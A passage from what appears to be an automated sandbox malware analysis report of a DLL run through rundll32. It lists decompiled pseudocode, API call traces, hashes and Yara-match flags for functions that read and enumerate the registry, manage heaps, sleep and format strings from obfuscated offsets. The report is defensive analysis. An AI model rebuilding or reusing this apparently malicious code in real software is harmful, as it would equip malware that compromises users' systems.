                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: String$AllocFree
                          • String ID:
                          • API String ID: 344208780-0
                          • Opcode ID: fb39ea3c97681e4de0a733d66f83c8c59df61b4a41ffc3a00e4bc55cf5868361
                          • Instruction ID: 80d11c0df2f7633d36f0683171aff4fd2ebec0bb4e30d7475be179f93a7235d8
                          • Opcode Fuzzy Hash: fb39ea3c97681e4de0a733d66f83c8c59df61b4a41ffc3a00e4bc55cf5868361
                          • Instruction Fuzzy Hash: 53313F75900249EFDB16CF98D4809EE7BB5FF48301F10842EFA8597251D775A641CF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010070D8 Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                          Download Yara Rule
                          C-Code - Quality: 41%
                          			E010070D8(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E010054BB(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E010078BF(_t23);
						}
					}
					return _t38;
				}
				_t26 = E01003695(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x100a34c, 1, 0,  *0x100a3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E010071B6(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E01003472(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E01003AC2(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E0100498E( &_v32, _t39);
					goto L13;
				}
			}














                          0x010070d8
                          0x010070e5
                          0x010070eb
                          0x010070ec
                          0x010070ed
                          0x010070ee
                          0x010070ef
                          0x010070f3
                          0x010070fa
                          0x010070ff
                          0x01007103
                          0x0100718b
                          0x0100718b
                          0x0100718e
                          0x01007190
                          0x01007198
                          0x0100719e
                          0x010071a1
                          0x010071a1
                          0x0100719e
                          0x010071ac
                          0x010071ac
                          0x0100710f
                          0x01007116
                          0x01007118
                          0x01007118
                          0x0100712f
                          0x01007133
                          0x01007136
                          0x01007141
                          0x01007148
                          0x01007148
                          0x01007151
                          0x01007155
                          0x01007163
                          0x01007157
                          0x01007157
                          0x01007158
                          0x01007159
                          0x0100715a
                          0x0100715b
                          0x0100715c
                          0x0100715c
                          0x01007168
                          0x0100716b
                          0x0100716f
                          0x01007171
                          0x01007171
                          0x01007178
                          0x00000000
                          0x0100717a
                          0x0100717a
                          0x01007187
                          0x00000000
                          0x01007187

                          APIs
                          • CreateEventA.KERNEL32(0100A34C,00000001,00000000,00000040,?,?,76CDF710,00000000,76CDF730), ref: 01007129
                          • SetEvent.KERNEL32(00000000), ref: 01007136
                          • Sleep.KERNEL32(00000BB8), ref: 01007141
                          • CloseHandle.KERNEL32(00000000), ref: 01007148
                            • Part of subcall function 010071B6: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,01007168,?), ref: 010071DC
                            • Part of subcall function 010071B6: RegEnumKeyExA.KERNEL32(?,?,?,01007168,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,01007168), ref: 01007223
                            • Part of subcall function 010071B6: WaitForSingleObject.KERNEL32(00000000,?,?,?,01007168,?,01007168,?,?,?,?,?,01007168,?), ref: 01007290
                            • Part of subcall function 010071B6: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,01007168,?), ref: 010072B8
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                          • String ID:
                          • API String ID: 891522397-0
                          • Opcode ID: ce29f804878d62b2be14f549f8c7a8f14321abeee0451be8d898b6c470d976d1
                          • Instruction ID: d76f88c1b583bee4e8d37101020a92bc72955a85571000fa45478a4a0076cbf4
                          • Opcode Fuzzy Hash: ce29f804878d62b2be14f549f8c7a8f14321abeee0451be8d898b6c470d976d1
                          • Instruction Fuzzy Hash: 7C219872D00119AFFB23AFEC8884CDE77BAAB44250F054465EBD1A71C0DB39A94587A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010012CA Relevance: 6.1, APIs: 4, Instructions: 80registryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E010012CA(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E01006D63(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E01006C2C(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12); // executed
					}
					L12:
					return _t43;
				}
				_t43 = E01006500(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}







                          0x010012d6
                          0x010012f9
                          0x01001303
                          0x01001309
                          0x0100130d
                          0x01001325
                          0x0100132a
                          0x01001372
                          0x0100132c
                          0x01001334
                          0x01001338
                          0x0100136f
                          0x0100133a
                          0x0100134c
                          0x01001350
                          0x01001366
                          0x01001352
                          0x01001355
                          0x01001357
                          0x0100135c
                          0x01001361
                          0x01001361
                          0x0100135c
                          0x01001350
                          0x01001338
                          0x0100137a
                          0x0100137a
                          0x01001381
                          0x01001387
                          0x01001387
                          0x010012ef
                          0x010012f3
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          • RegOpenKeyW.ADVAPI32(80000002,05299E92,05299E92), ref: 01001303
                          • RegQueryValueExW.KERNEL32(05299E92,?,00000000,80000002,00000000,00000000,?,01003551,3D010090,80000002,01007168,00000000,01007168,?,05299E92,80000002), ref: 01001325
                          • RegQueryValueExW.ADVAPI32(05299E92,?,00000000,80000002,00000000,00000000,00000000,?,01003551,3D010090,80000002,01007168,00000000,01007168,?,05299E92), ref: 0100134A
                          • RegCloseKey.KERNEL32(05299E92,?,01003551,3D010090,80000002,01007168,00000000,01007168,?,05299E92,80000002,00000000,?), ref: 0100137A
                            • Part of subcall function 01006500: SafeArrayDestroy.OLEAUT32(00000000), ref: 01006588
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                          • String ID:
                          • API String ID: 486277218-0
                          • Opcode ID: e5dd0c790a7d478e93b2a4a600edf3112b34c55c24cdebc1d885f260d14082a3
                          • Instruction ID: 24aee36448e8392d665b92bfddab46906dfd6a88f358cb79d7cd6e168e8b5f6c
                          • Opcode Fuzzy Hash: e5dd0c790a7d478e93b2a4a600edf3112b34c55c24cdebc1d885f260d14082a3
                          • Instruction Fuzzy Hash: 3B213C7250411EBFEF229F94DC80CEE7BA9FB04390F008426FE55975A0D632DD609B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B79661 Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON
                          Download Yara Rule
                          APIs
                          • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,05B662DD,?,?,?,?), ref: 05B79686
                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 05B7969D
                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,05B662DD,?,?,?,?,?,?,00000000), ref: 05B796B8
                          • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,05B662DD,?,?,?,?), ref: 05B796D7
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapQueryValue$AllocateFree
                          • String ID:
                          • API String ID: 4267586637-0
                          • Opcode ID: 06922e95216afe396c1dc8898d19d4a65a46377155bec2e3abc26e07a715f7db
                          • Instruction ID: 8ac7da5845b98ded7fc30be9ef446124780b7df5f7b5a97f496926e3c8b05974
                          • Opcode Fuzzy Hash: 06922e95216afe396c1dc8898d19d4a65a46377155bec2e3abc26e07a715f7db
                          • Instruction Fuzzy Hash: 10113AB651011CFFDB12DF94DC85CEEBBBEEB89360B104196F911A7210E671AE40EB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B671B4 Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,05B8A170,00000000,05B75D81,?,05B6F2F7,?), ref: 05B671D3
                          • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,05B8A170,00000000,05B75D81,?,05B6F2F7,?), ref: 05B671DE
                          • _wcsupr.NTDLL ref: 05B671EB
                          • lstrlenW.KERNEL32(00000000), ref: 05B671F3
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                          • String ID:
                          • API String ID: 2533608484-0
                          • Opcode ID: cc3f0f312c97c138d8a9ecbcbac639838af878579f2b1b7af3daba35f5a63d32
                          • Instruction ID: 90c16d2a20e53997b98c49056f6ce0c0f0bb18d66e209083b08864b0676e0cb5
                          • Opcode Fuzzy Hash: cc3f0f312c97c138d8a9ecbcbac639838af878579f2b1b7af3daba35f5a63d32
                          • Instruction Fuzzy Hash: 16F0E9322151102BD3127A759C8DE7F5B5EFF82AA972018A9F606D3140DE68FC01C5A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7C384 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05B7C3A3
                            • Part of subcall function 05B68FAE: RtlEnterCriticalSection.NTDLL(00000000), ref: 05B68FBA
                            • Part of subcall function 05B68FAE: CloseHandle.KERNEL32(?), ref: 05B68FC8
                            • Part of subcall function 05B68FAE: RtlLeaveCriticalSection.NTDLL(00000000), ref: 05B68FE4
                          • CloseHandle.KERNEL32(?), ref: 05B7C3B1
                          • InterlockedDecrement.KERNEL32(05B8A05C), ref: 05B7C3C0
                            • Part of subcall function 05B7E831: SetEvent.KERNEL32(000005BC,05B7C3DB), ref: 05B7E83B
                            • Part of subcall function 05B7E831: CloseHandle.KERNEL32(000005BC), ref: 05B7E850
                            • Part of subcall function 05B7E831: HeapDestroy.KERNELBASE(05BC0000), ref: 05B7E860
                          • RtlExitUserThread.NTDLL(00000000), ref: 05B7C3DC
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                          • String ID:
                          • API String ID: 1141245775-0
                          • Opcode ID: d1e4d1aed871961306d89e8b46d225a0344418a31f56c2f400cb9058e8283427
                          • Instruction ID: 2b6b32a8c6d093949c269d7631fe220296d3dce2dfc3d6a5a2f4cf4d7778f684
                          • Opcode Fuzzy Hash: d1e4d1aed871961306d89e8b46d225a0344418a31f56c2f400cb9058e8283427
                          • Instruction Fuzzy Hash: 9FF03C31650208BFD7116B68984AE7E3F7AFF42730B611299F525972C0EB74B901CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0100765B Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 50%
                          			E0100765B(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x100a3cc; // 0x52995b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x100a3cc; // 0x52995b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x100a030) {
					HeapFree( *0x100a2d8, 0, _t8);
				}
				_t9 = E01006E6D(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x100a3cc; // 0x52995b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                          0x0100765b
                          0x0100765b
                          0x01007664
                          0x01007674
                          0x01007674
                          0x01007679
                          0x0100767e
                          0x00000000
                          0x00000000
                          0x0100766e
                          0x0100766e
                          0x01007680
                          0x01007684
                          0x01007696
                          0x01007696
                          0x010076a1
                          0x010076a6
                          0x010076a9
                          0x010076ae
                          0x010076b2
                          0x010076b8

                          APIs
                          • RtlEnterCriticalSection.NTDLL(05299570), ref: 01007664
                          • Sleep.KERNEL32(0000000A), ref: 0100766E
                          • HeapFree.KERNEL32(00000000,00000000), ref: 01007696
                          • RtlLeaveCriticalSection.NTDLL(05299570), ref: 010076B2
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                          • String ID:
                          • API String ID: 58946197-0
                          • Opcode ID: a6bb0fe7a6e4c6f2f4b82ec68a026bf6a17addb1aae8e562a6f1034c1a6699ef
                          • Instruction ID: b0c9ff4ed375b97583d44f0b00b36c6cf36e92ad7067fb3a4f16a156acfdc3df
                          • Opcode Fuzzy Hash: a6bb0fe7a6e4c6f2f4b82ec68a026bf6a17addb1aae8e562a6f1034c1a6699ef
                          • Instruction Fuzzy Hash: 87F0B271300242DFE7229B68DC48A1A3BE8AB14744F049454B6CAD72A6C62AE850CB25
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00D212CB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131memoryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.506070289.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_d20000_rundll32.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID: X
                          • API String ID: 544645111-3081909835
                          • Opcode ID: a0a19b89f86dbda0f467e9c45e2967a6237675e2b94d60135d57628e7d7484b3
                          • Instruction ID: 3731eabe9e70265f4ee8b9ff8a6cfcbcc4ce3fe2d854fc2b89788c7bd78ee404
                          • Opcode Fuzzy Hash: a0a19b89f86dbda0f467e9c45e2967a6237675e2b94d60135d57628e7d7484b3
                          • Instruction Fuzzy Hash: 9351B8B8E043188FDB14CF99C480A9DFBB1FF98314F25856AE919AB356C730A845CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01001CD6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E01001CD6(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				signed int _t10;

				_t10 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x100a2d8 = _t3;
				if(_t3 == 0) {
					_t8 = 8;
					return _t8;
				}
				 *0x100a1c8 = GetTickCount();
				_t5 = E01006D78(_a4);
				if(_t5 == 0) {
					_t5 = E01004B89(_t9, _a4); // executed
					if(_t5 == 0) {
						if(E01006B1C(_t9) != 0) {
							 *0x100a300 = 1; // executed
						}
						_t7 = E01003D2C(_t10); // executed
						return _t7;
					}
				}
				return _t5;
			}









                          0x01001cd6
                          0x01001cdf
                          0x01001ce5
                          0x01001cec
                          0x01001cf0
                          0x00000000
                          0x01001cf0
                          0x01001cfd
                          0x01001d02
                          0x01001d09
                          0x01001d0f
                          0x01001d16
                          0x01001d1f
                          0x01001d21
                          0x01001d21
                          0x01001d2b
                          0x00000000
                          0x01001d2b
                          0x01001d16
                          0x01001d30

                          APIs
                          • HeapCreate.KERNEL32(00000000,00400000,00000000,01005E54,?), ref: 01001CDF
                          • GetTickCount.KERNEL32 ref: 01001CF3
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: CountCreateHeapTick
                          • String ID: nFm@
                          • API String ID: 2177101570-673577508
                          • Opcode ID: 0ed08f84d732c5803febc9d95ca3f21493158de358889a85fd2974c0de14fad1
                          • Instruction ID: f6d838dd0fb60614e9efcc18499a37be61e04bbfd53a71068add3f78f0be5ebb
                          • Opcode Fuzzy Hash: 0ed08f84d732c5803febc9d95ca3f21493158de358889a85fd2974c0de14fad1
                          • Instruction Fuzzy Hash: 1BF06DB0640702AAFB637B74AD04B5A3AE47B20784F104826F9C4D50C6EBBAC0409726
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7A451 Relevance: 5.1, APIs: 4, Instructions: 110COMMON
                          Download Yara Rule
                          APIs
                          • memset.NTDLL ref: 05B7A477
                          • memcpy.NTDLL ref: 05B7A49F
                            • Part of subcall function 05B77950: NtAllocateVirtualMemory.NTDLL(05B7EB0F,00000000,00000000,05B7EB0F,00003000,00000040), ref: 05B77981
                            • Part of subcall function 05B77950: RtlNtStatusToDosError.NTDLL(00000000), ref: 05B77988
                            • Part of subcall function 05B77950: SetLastError.KERNEL32(00000000), ref: 05B7798F
                          • GetLastError.KERNEL32(00000010,00000218,05B8386D,00000100,?,00000318,00000008), ref: 05B7A4B6
                          • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,05B8386D,00000100), ref: 05B7A599
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                          • String ID:
                          • API String ID: 685050087-0
                          • Opcode ID: 80f60978f73c43e93e711b1cb2e24cf3ec568e0bd3954b4543244117e6902d58
                          • Instruction ID: cc21fb93d5530a6b90278fcb9752d71d9126ed35a635937eb608e4f0edcebb72
                          • Opcode Fuzzy Hash: 80f60978f73c43e93e711b1cb2e24cf3ec568e0bd3954b4543244117e6902d58
                          • Instruction Fuzzy Hash: 864160B1604705AFD761DF24DC45FABBBE9FB48710F008A6DF5A9C6290E730E5148BA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0100216C Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0100216C(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E01003695(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x100a348; // 0x428d5a8
				_t4 = _t24 + 0x100be58; // 0x5299400
				_t5 = _t24 + 0x100be00; // 0x4f0053
				_t26 = E0100155C( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x100a348; // 0x428d5a8
						_t11 = _t32 + 0x100be4c; // 0x52993f4
						_t48 = _t11;
						_t12 = _t32 + 0x100be00; // 0x4f0053
						_t52 = E010028C4(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x100a348; // 0x428d5a8
							_t13 = _t35 + 0x100ba51; // 0x30314549
							_t37 = E010041FA(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x100a2fc - 6;
								if( *0x100a2fc <= 6) {
									_t42 =  *0x100a348; // 0x428d5a8
									_t15 = _t42 + 0x100bde2; // 0x52384549
									E010041FA(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x100a348; // 0x428d5a8
							_t17 = _t38 + 0x100be90; // 0x5299438
							_t18 = _t38 + 0x100be68; // 0x680043
							_t45 = E010074B6(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x100a2d8, 0, _t52);
						}
					}
					HeapFree( *0x100a2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E01003AC2(_t54);
				}
				return _t45;
			}



















                          0x0100216c
                          0x0100217c
                          0x0100217f
                          0x01002186
                          0x01002188
                          0x01002188
                          0x0100218b
                          0x01002190
                          0x01002197
                          0x010021a4
                          0x010021a9
                          0x010021ad
                          0x010021bb
                          0x010021c9
                          0x010021cd
                          0x0100225e
                          0x0100225e
                          0x010021d3
                          0x010021d3
                          0x010021d8
                          0x010021d8
                          0x010021df
                          0x010021eb
                          0x010021ed
                          0x010021ef
                          0x010021f1
                          0x010021f8
                          0x01002203
                          0x0100220a
                          0x0100220c
                          0x01002213
                          0x01002215
                          0x0100221c
                          0x01002227
                          0x01002227
                          0x01002213
                          0x0100222c
                          0x01002231
                          0x01002238
                          0x01002256
                          0x01002258
                          0x01002258
                          0x010021ef
                          0x0100226a
                          0x0100226a
                          0x0100226c
                          0x01002271
                          0x01002273
                          0x01002273
                          0x0100227e

                          APIs
                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05299400,00000000,?,76CDF710,00000000,76CDF730), ref: 010021BB
                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05299438,?,00000000,30314549,00000014,004F0053,052993F4), ref: 01002258
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,010066BE), ref: 0100226A
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: f0edf14ebf17a88166e17c6eb291bd5c62dde3cfeb8e8d39066a0c418274f8a6
                          • Instruction ID: f3d293f6562c4be7997140df2da698efad00ac97c09fcc79ebcd2efc1463fcd6
                          • Opcode Fuzzy Hash: f0edf14ebf17a88166e17c6eb291bd5c62dde3cfeb8e8d39066a0c418274f8a6
                          • Instruction Fuzzy Hash: 72317235A00219FFEB23DBD4DC48EDE7BBDEB48700F154065B68497191D7B2AA48DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010043EB Relevance: 4.6, APIs: 3, Instructions: 82memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 85%
                          			E010043EB(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				intOrPtr _t30;
				intOrPtr _t34;
				intOrPtr* _t42;
				void* _t43;
				void* _t46;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_t42 = _a16;
				_t48 = __eax;
				_t22 =  *0x100a348; // 0x428d5a8
				_t2 = _t22 + 0x100b67a; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
				if( *0x100a2ec >= 5) {
					_t30 = E010056C8(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
					L5:
					_a4 = _t30;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x100a2ec =  *0x100a2ec + 1;
						L10:
						return _a4;
					}
					_t50 = _a16;
					 *_t48 = _a16;
					_t49 = _v8;
					 *_t42 = E0100708D(_t50, _t49); // executed
					_t34 = E01002B23(_t49, _t50); // executed
					if(_t34 != 0) {
						 *_a8 = _t49;
						 *_a12 = _t34;
						if( *0x100a2ec < 5) {
							 *0x100a2ec =  *0x100a2ec & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E0100561E();
					HeapFree( *0x100a2d8, 0, _t49);
					goto L9;
				}
				_t51 =  *0x100a3e0; // 0x5299b78
				if(RtlAllocateHeap( *0x100a2d8, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t30 = E0100300E(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
				goto L5;
			}















                          0x010043f2
                          0x010043f9
